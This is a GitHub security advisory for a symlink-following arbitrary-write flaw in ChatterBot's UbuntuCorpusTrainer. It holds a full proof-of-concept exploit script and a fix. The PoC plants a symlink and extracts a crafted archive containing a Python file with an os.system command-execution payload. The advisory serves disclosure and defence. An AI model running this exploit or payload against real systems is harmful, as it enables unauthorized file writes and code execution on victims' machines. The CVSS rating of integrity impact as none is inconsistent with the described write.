GHSA-wvrh-2f4m-924v — medium GitHub Advisory in pip/ChatterBot

Description

Summary

ChatterBot's UbuntuCorpusTrainer.extract() writes to a predictable, home-rooted output directory (~/ubuntu_data/ubuntu_dialogs) using a check-then-create pattern (if not os.path.exists: os.makedirs) followed by tar.extractall(path=self.data_path). A local attacker who can pre-plant a symlink at that path makes os.path.exists() return True, because it follows the symlink to its existing target, so makedirs is skipped. The subsequent extractall then writes the archive contents through the symlink into the attacker-chosen directory.

The existing safe_extract function validates tar member names (zip-slip defense) but does not validate the output directory itself — it cannot detect that self.data_path is a symlink. This is the defining distinction between the archive_extraction (zip-slip) and insecure_fs_create_toctou families.

Vulnerability Details

Predictable output directory (lines 535-546)

home_directory = os.path.expanduser('~')
self.data_directory = kwargs.get(
    'ubuntu_corpus_data_directory',
    os.path.join(home_directory, 'ubuntu_data')   # ~/ubuntu_data (predictable)
)
self.data_path = os.path.join(
    self.data_directory, 'ubuntu_dialogs'          # ~/ubuntu_data/ubuntu_dialogs
)
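Because the default location is derived from the home directory, one way a caller might sidestep the predictable path is to pass the ubuntu_corpus_data_directory keyword shown above and point it at a freshly created private directory. The following is a minimal sketch under that assumption, for a POSIX system. The trainer construction appears only as a comment, and the chatbot variable in it is hypothetical.

```python
import os
import stat
import tempfile

# mkdtemp creates a new directory with an unpredictable name that is
# accessible only to the current user.
private_dir = tempfile.mkdtemp(prefix="ubuntu_corpus_")
mode = stat.S_IMODE(os.stat(private_dir).st_mode)

# Hypothetical usage (not executed here, assumes an existing chatbot object):
# trainer = UbuntuCorpusTrainer(chatbot, ubuntu_corpus_data_directory=private_dir)
```

This only moves the data directory; it does not change the check-then-create logic inside extract().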

Check-then-create (lines 621-622)

def extract(self, file_path: str):
    if not os.path.exists(self.data_path):   # ← follows symlink → True → skips makedirs
        os.makedirs(self.data_path)          # ← never reached if symlink exists
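The behaviour described in the comments can be reproduced in isolation. The following is a minimal sketch, assuming a POSIX system where unprivileged users can create symlinks; all directory names are hypothetical and exist only for the demonstration.

```python
import os
import tempfile

# Hypothetical stand-ins for the attacker's directory and the predictable path.
base = tempfile.mkdtemp(prefix="demo_")
attacker_dir = os.path.join(base, "attacker")
data_path = os.path.join(base, "ubuntu_dialogs")
os.mkdir(attacker_dir)
os.symlink(attacker_dir, data_path)

# os.path.exists() follows the link, so a "create if missing" branch is skipped.
exists_follows_link = os.path.exists(data_path)
# os.path.islink() inspects the link itself and reveals the problem.
is_link = os.path.islink(data_path)

# A dangling link behaves differently: exists() is False, lexists() is True.
dangling = os.path.join(base, "dangling")
os.symlink(os.path.join(base, "missing"), dangling)
dangling_exists = os.path.exists(dangling)
dangling_lexists = os.path.lexists(dangling)
```

The attack therefore depends on the link target existing at the time of the check.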

Extraction through symlink (lines 633-644)

def safe_extract(tar, path='.', members=None, *, numeric_owner=False):
    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not is_within_directory(path, member_path):    # ← validates MEMBER names only
            raise Exception('Attempted Path Traversal in Tar File')
    tar.extractall(path, members, numeric_owner=numeric_owner)  # ← path is symlink → writes to target

safe_extract(tar, path=self.data_path, ...)   # self.data_path = symlink → attacker dir

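The is_within_directory helper used by safe_extract calls os.path.abspath() on both self.data_path and each member path. abspath normalizes a path lexically and does not resolve symlinks, so the symlink path remains the common prefix and every clean-named member trivially passes the check. The symlink is only followed later, when extractall opens the files, so the contents land in the attacker's target directory.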
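The member check can be exercised on its own to see why it offers no protection when the base directory is a symlink. This is a minimal sketch, assuming a POSIX system. The helper mirrors the one reproduced in the PoC below, and the directory and file names are hypothetical. Note that os.path.abspath() only normalizes a path lexically, whereas os.path.realpath() resolves symlinks.

```python
import os
import tempfile


def is_within_directory(directory, target):
    # Lexical prefix check, as in the advisory's PoC.
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    prefix = os.path.commonprefix([abs_directory, abs_target])
    return prefix == abs_directory


# realpath() on the temp dir avoids surprises where the temp root is itself a link.
base = os.path.realpath(tempfile.mkdtemp(prefix="demo_"))
attacker_dir = os.path.join(base, "attacker")
data_path = os.path.join(base, "ubuntu_dialogs")
os.mkdir(attacker_dir)
os.symlink(attacker_dir, data_path)

member_path = os.path.join(data_path, "dialog_001.tsv")

lexical_base = os.path.abspath(data_path)        # still the symlink path
resolved_base = os.path.realpath(data_path)      # the attacker's directory
check_passes = is_within_directory(data_path, member_path)
resolved_member = os.path.realpath(member_path)  # where a write would land
```

The check passes while the resolved member path sits inside the attacker's directory, which is the gap the advisory describes.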

Proof of Concept

Environment

Component	Detail
chatterbot	1.2.13 (pip install)
Python	3.11.0

Exploit

import io
import os
import shutil
import sys
import tarfile
import tempfile
from pathlib import Path

from chatterbot.trainers import UbuntuCorpusTrainer

# Stand-in for the directory the attacker wants the victim to write into
ATTACKER_TARGET = Path(tempfile.mkdtemp(prefix="pwned_"))


def main():
    # Step 1: plant a symlink at the (simulated) predictable data path
    test_base = Path(tempfile.mkdtemp(prefix="cb_exploit_"))
    data_dir = test_base / "ubuntu_data"
    data_path = data_dir / "ubuntu_dialogs"
    data_dir.mkdir(parents=True, exist_ok=True)
    os.symlink(str(ATTACKER_TARGET), str(data_path))
    print(f"[1] Symlink planted: {data_path} -> {ATTACKER_TARGET}")

    # Step 2: show that the existence check follows the symlink
    exists_check = os.path.exists(data_path)
    print(f"[2] os.path.exists(symlink) = {exists_check} (follows symlink → skips makedirs)")

    # Build a small archive with clean member names (no path traversal)
    tar_path = test_base / "corpus.tar.gz"
    with tarfile.open(str(tar_path), "w:gz") as tf:
        info = tarfile.TarInfo(name="dialog_001.tsv")
        payload = b"2024-01-01\tuser1\t0\tARBITRARY_CONTENT_VIA_SYMLINK\n"
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))

        info2 = tarfile.TarInfo(name="config.py")
        rce = b"import os; os.system('id > /tmp/chatterbot_rce')\n"
        info2.size = len(rce)
        tf.addfile(info2, io.BytesIO(rce))

    # Step 3: replicate the check-then-create and safe_extract logic of extract()
    if not os.path.exists(data_path):
        os.makedirs(data_path)

    def is_within_directory(directory, target):
        abs_directory = os.path.abspath(directory)
        abs_target = os.path.abspath(target)
        prefix = os.path.commonprefix([abs_directory, abs_target])
        return prefix == abs_directory

    with tarfile.open(str(tar_path), "r:gz") as tar:
        for member in tar.getmembers():
            member_path = os.path.join(str(data_path), member.name)
            if not is_within_directory(str(data_path), member_path):
                raise Exception("Attempted Path Traversal in Tar File")
        tar.extractall(str(data_path))

    print("[3] extractall(data_path): data_path is symlink, writes to target")

    # Verify that the files landed in the attacker's directory
    files = list(ATTACKER_TARGET.iterdir())
    if files:
        print(f"\n[+] EXPLOIT SUCCESSFUL: {len(files)} files in attacker directory:")
        for f in sorted(files):
            print(f"    {f.name}: {f.read_text().strip()[:60]}")
    else:
        print("[-] Failed")
        shutil.rmtree(str(test_base), ignore_errors=True)
        shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
        sys.exit(1)

    shutil.rmtree(str(test_base), ignore_errors=True)
    shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
    sys.exit(0)


if __name__ == "__main__":
    print(f"chatterbot installed: {UbuntuCorpusTrainer.__module__}")
    print(f"Attacker target: {ATTACKER_TARGET}")
    print()
    main()

PoC output

Suggested Fix

Refuse symlinks on the output directory before extraction:

def extract(self, file_path: str):
    if os.path.islink(self.data_path):
        raise self.TrainerInitializationException(
            f'Refusing to extract to symlink: {self.data_path}')
    if not os.path.exists(self.data_path):
        os.makedirs(self.data_path)
    ...
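A slightly stricter variant of the same idea is sketched below. It is not the project's actual patch. It assumes a POSIX system, and the helper name prepare_output_dir and the use of ValueError are hypothetical choices for illustration. It creates the directory with os.mkdir, which fails if anything already exists at the path, and then inspects the result with os.lstat, which does not follow symlinks.

```python
import os
import stat
import tempfile


def prepare_output_dir(path):
    """Create path if missing and refuse anything that is not a real directory."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    try:
        os.mkdir(path, 0o700)      # fails if a file, directory or link exists
    except FileExistsError:
        pass
    info = os.lstat(path)          # lstat() examines the link itself
    if not stat.S_ISDIR(info.st_mode):
        raise ValueError(f"Refusing to extract to non-directory: {path}")
    if info.st_uid != os.getuid():
        raise ValueError(f"Refusing to extract to directory owned by another user: {path}")
    return path


# Demonstration with hypothetical paths
base = tempfile.mkdtemp(prefix="demo_")
good = prepare_output_dir(os.path.join(base, "ubuntu_dialogs"))

link = os.path.join(base, "link")
os.symlink(base, link)
try:
    prepare_output_dir(link)
    rejected = False
except ValueError:
    rejected = True
```

A check of this kind narrows the window but does not remove it entirely: an attacker who can write to the parent directory could still swap the path between the check and the extraction.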

Basic information

Type: reviewed
Severity: medium
Published (advisory): 2026-06-19 22:08:08 UTC
Updated: 2026-06-19 22:08:09 UTC
GitHub reviewed: 2026-06-19 22:08:08 UTC

CVSS Scores

Base score	Version	Severity	Vector
5.5	3.1	-	`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`

Attack vector (AV:L): They already need access on the box, or another person has to do something wrong; it's not a remote drive-by.
Attack complexity (AC:L): Once they can reach the bug, pulling it off is straightforward, with no weird race conditions or rare setup.
Privileges required (PR:L): A normal user session is enough; they don't have to be admin.
User interaction (UI:N): Nobody has to click "OK" or open a trap file; it can work without a victim helping.
Scope (S:U): Damage stays in the same "trust bubble" as the broken component, with no big spill into unrelated systems.
Confidentiality (C:H): Serious risk that confidential data gets exposed in a big way.
Integrity (I:N): Data isn't meaningfully altered or forged.
Availability (A:N): Service keeps running; no real outage angle.
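The base score of 5.5 can be checked against the vector with the CVSS 3.1 base score equations. The sketch below is a worked calculation, not an official calculator. The numeric weights are the CVSS 3.1 specification values for these metric levels, and the variable names are my own.

```python
import math


def roundup(value):
    """CVSS 3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


# Weights for AV:L / AC:L / PR:L (scope unchanged) / UI:N
av, ac, pr, ui = 0.55, 0.77, 0.62, 0.85
# Weights for C:H / I:N / A:N
c, i, a = 0.56, 0.0, 0.0

iss = 1 - (1 - c) * (1 - i) * (1 - a)        # impact sub-score
impact = 6.42 * iss                          # formula for S:U
exploitability = 8.22 * av * ac * pr * ui
base_score = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0
```

Impact comes to roughly 3.60 and exploitability to roughly 1.83, and their sum rounds up to 5.5.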

Identifiers

Type	Value
GHSA	GHSA-wvrh-2f4m-924v

CWEs

CWE id	Name
CWE-61	UNIX Symbolic Link (Symlink) Following
CWE-367	Time-of-check Time-of-use (TOCTOU) Race Condition

Credits

AAtomical (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem	Package	Vulnerable range	First patched	Vulnerable functions
pip	ChatterBot	<= 1.2.13	1.2.14	—
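The range in the table can be turned into a quick check against an installed version. This is a rough sketch under stated assumptions. The helper is_affected is hypothetical, and it handles only plain X.Y.Z version strings, not pre-release or local suffixes.

```python
def is_affected(version):
    """Return True if a plain X.Y.Z version string falls in the range <= 1.2.13."""
    parts = tuple(int(p) for p in version.split("."))
    return parts <= (1, 2, 13)


# The installed version could be obtained with the standard library, e.g.:
# from importlib.metadata import version
# installed = version("ChatterBot")
vulnerable = is_affected("1.2.13")
patched = is_affected("1.2.14")
```

For anything beyond simple release numbers, a proper version parser is a safer choice than tuple comparison.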

ChatterBot: Symlink-Following Arbitrary Write via UbuntuCorpusTrainer